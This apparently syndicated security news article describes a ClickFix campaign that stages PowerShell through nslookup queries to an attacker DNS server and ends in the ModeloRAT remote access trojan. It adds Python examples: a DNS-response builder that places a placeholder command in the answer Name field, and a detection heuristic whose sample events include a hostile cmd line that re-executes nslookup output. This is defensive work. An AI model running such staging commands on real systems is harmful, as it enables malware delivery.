New ClickFix Campaign Uses Nslookup to Fetch Malicious PowerShell Script

According to Microsoft, the ClickFix social engineering technique has evolved again, and this iteration shows that even a routine built-in utility can be repurposed as a covert channel for malware delivery. Rather than relying on deceptive downloads and embedded scripts alone, the operators walk the victim through a carefully staged prompt that instructs them to run what looks like a harmless system command.
Behind that veneer of legitimacy, the command issues a DNS query with nslookup and quietly retrieves the next-stage payload from attacker-controlled infrastructure.
By hiding malicious intent inside routine administrative behavior, the campaign turns a standard troubleshooting tool into an unremarkable infection channel.

In Microsoft’s analysis, the newly observed campaign instructs victims to run an nslookup command that queries a DNS server controlled by the attacker, named explicitly on the command line, rather than the system’s configured resolver.

The command requests a specific hostname and directs the query to a remote IP address under the threat actor’s control. Instead of returning an ordinary DNS record, the attacker’s server responds with a crafted entry whose “Name” field carries a second PowerShell command.
The Windows command interpreter then parses that response and executes the embedded command, turning a standard DNS lookup into a covert staging mechanism for code delivery. According to Microsoft Threat Intelligence, this represents another evolution of ClickFix’s evasion strategy.
While earlier variants primarily retrieved payloads over HTTP, this one relies on DNS for both communication and dynamic payload distribution.
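To make the staging trick concrete, the following added example (not Microsoft’s code, and not the campaign’s actual packets or command) builds a DNS response in which the answer record’s owner name is a command string rather than a hostname, then parses it back the way a resolver or log pipeline would. The query name, the resolver address and the placeholder command are all made up for the example. The point it demonstrates is that RFC 1035 labels are arbitrary octets, so nothing on the wire stops a server from putting shell syntax in the Name field; a name that fails hostname syntax in resolver logs is therefore a useful detection signal. Whether a particular nslookup build prints such a name verbatim is not asserted here.

```python
"""DNS response whose answer Name field carries a command string.

Added example, not the campaign's packets. The payload below is a harmless
placeholder; the query name and server address are documentation values.
"""
import re
import struct

# Harmless placeholder standing in for the staged PowerShell command (assumed).
PAYLOAD_NAME = "powershell -c Write-Host staged"


def encode_name(name: str) -> bytes:
    """Encode a dotted name as length-prefixed labels (RFC 1035 section 3.1).
    Labels are raw octets, so spaces and punctuation are allowed; only the
    63-octet label limit is enforced, as a real server would enforce it."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode()
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label length: {len(raw)}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_response(txid: int, qname: str, answer_name: str, ip: str) -> bytes:
    """One question, one A record. A normal server points the owner name back
    at the question (compression pointer 0xC00C); when answer_name differs
    from qname, the owner name is emitted as literal labels instead, which is
    where the attacker-controlled string goes."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    owner = b"\xc0\x0c" if answer_name == qname else encode_name(answer_name)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = owner + struct.pack("!HHIH", 1, 1, 60, 4) + rdata
    return header + question + answer


def read_name(pkt: bytes, off: int):
    """Decode a name at off, following compression pointers. Returns the name
    and the offset just past it in the unfollowed stream."""
    labels, end, jumped = [], None, False
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:  # compression pointer
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(pkt[off:off + length].decode("latin-1"))
        off += length
    return ".".join(labels), (end if jumped else off)


def answer_names(pkt: bytes):
    """Return the owner names of every record in the answer section."""
    _, _flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    for _ in range(qd):
        _, off = read_name(pkt, off)
        off += 4  # QTYPE + QCLASS
    names = []
    for _ in range(an):
        name, off = read_name(pkt, off)
        rdlength = struct.unpack("!H", pkt[off + 8:off + 10])[0]
        off += 10 + rdlength  # TYPE, CLASS, TTL, RDLENGTH, RDATA
        names.append(name)
    return names


# Hostname syntax per RFC 952/1123: letters, digits, hyphens, dot-separated.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*$")


def looks_like_hostname(name: str) -> bool:
    return bool(HOSTNAME_RE.match(name))


def suspicious_answer_names(pkt: bytes):
    """Owner names that are valid on the wire but not valid hostnames."""
    return [n for n in answer_names(pkt) if not looks_like_hostname(n)]


if __name__ == "__main__":
    pkt = build_response(0x1234, "stage.example.invalid", PAYLOAD_NAME, "203.0.113.10")
    print(answer_names(pkt))
    print(suspicious_answer_names(pkt))
```

The same `suspicious_answer_names` check can be run over any passive-DNS or resolver log that records answer owner names; a legitimate response never needs a space, quote or dollar sign in a name.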

Although the lure used to persuade users is unclear, victims are reportedly instructed to execute the command through the Windows Run dialog, which makes the tactic depend on social engineering rather than on an exploit.

By moving execution to user-initiated system utilities, the attackers reduce the chance that conventional web or network filtering controls will fire.
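Because the lookup runs from a user-launched utility, the place to catch it is endpoint process telemetry rather than the web proxy. The following added detection heuristic is not from Microsoft’s report; the process-creation records are constructed for the example, the resolver allowlist is assumed, and the cmd.exe wrapper (a `for /f` loop that feeds nslookup output back to the interpreter) is an assumed shape of the command, not the campaign’s verbatim command line. It scores three independent signals: an explicit resolver that is not one of the organization’s own, nslookup output being consumed by a command interpreter, and a parent of explorer.exe, which is what a command typed into the Run dialog looks like.

```python
"""Heuristic for nslookup-based staging in process-creation telemetry.

Added example, not Microsoft's detection logic. Events, resolver allowlist
and the for /f wrapper are constructed or assumed for this example.
"""
import re

# Sysmon-style process creation events, constructed for this example.
EVENTS = [
    {   # benign: admin troubleshooting from a console
        "Image": r"C:\Windows\System32\nslookup.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "nslookup mail.contoso.com",
    },
    {   # benign: explicitly querying an internal resolver
        "Image": r"C:\Windows\System32\nslookup.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "nslookup -type=mx contoso.com 10.0.0.53",
    },
    {   # suspicious: Run dialog parent, external resolver, output re-executed
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "cmd /c for /f \"tokens=*\" %i in "
                       "('nslookup stage.example.invalid 203.0.113.10') do %i",
    },
]

# Assumed corporate resolvers; anything else named explicitly is unusual.
ALLOWED_RESOLVERS = {"10.0.0.53", "10.0.0.54"}

TOKEN = r"[^\s'\")]+"
# nslookup [-opt ...] <host> <server>: capture host and the explicit server.
NSLOOKUP_RE = re.compile(r"nslookup(?:\s+-" + TOKEN + r")*\s+(" + TOKEN + r")\s+(" + TOKEN + r")",
                         re.IGNORECASE)
# Output of nslookup captured by a for /f loop or piped into a shell.
FOR_F_RE = re.compile(r"\bfor\s+/f\b.*\bin\s*\(\s*'[^']*nslookup", re.IGNORECASE)
PIPE_RE = re.compile(r"nslookup[^|]*\|\s*(cmd|powershell|pwsh)", re.IGNORECASE)


def analyze(event: dict) -> list:
    """Return the list of reasons this event looks like nslookup staging."""
    reasons = []
    cmd = event["CommandLine"]
    m = NSLOOKUP_RE.search(cmd)
    if m and m.group(2).lower() not in ALLOWED_RESOLVERS:
        reasons.append(f"explicit resolver outside allowlist: {m.group(2)}")
    if FOR_F_RE.search(cmd) or PIPE_RE.search(cmd):
        reasons.append("nslookup output fed back into a command interpreter")
    if event["ParentImage"].lower().endswith("explorer.exe") and "nslookup" in cmd.lower():
        reasons.append("launched from explorer.exe (consistent with the Run dialog)")
    return reasons


def suspicious_events(events, threshold: int = 2) -> list:
    """Events with at least `threshold` independent signals."""
    return [e for e in events if len(analyze(e)) >= threshold]


if __name__ == "__main__":
    for e in EVENTS:
        print(e["CommandLine"], "->", analyze(e))
```

Requiring two signals keeps an admin who explicitly queries an external resolver from a console out of the alert; the Run-dialog parent plus re-executed output is the combination that matches the behaviour described above.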

PowerShell scripts that are executed in this stage retrieve additional components from infrastructure under attacker control. 

Microsoft’s investigation determined that the subsequent payload is a compressed archive containing a portable Python runtime along with malicious scripts. Before establishing persistence on the infected host, these scripts conduct reconnaissance against the host and its domain environment, gathering network and system information.
Persistence is achieved by writing a VBScript file to the user’s AppData directory and placing a shortcut in the Windows Startup folder so that it runs at logon. A remote access trojan named ModeloRAT is deployed as part of the infection chain, giving the operator sustained control over compromised systems.
By embedding executable instructions in DNS responses, a DNS-based staging strategy lets adversaries adjust payloads in real time while blending malicious traffic with routine name-resolution activity. Besides complicating detection, this technique demonstrates that ClickFix continues to refine itself into a mod

[…]

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents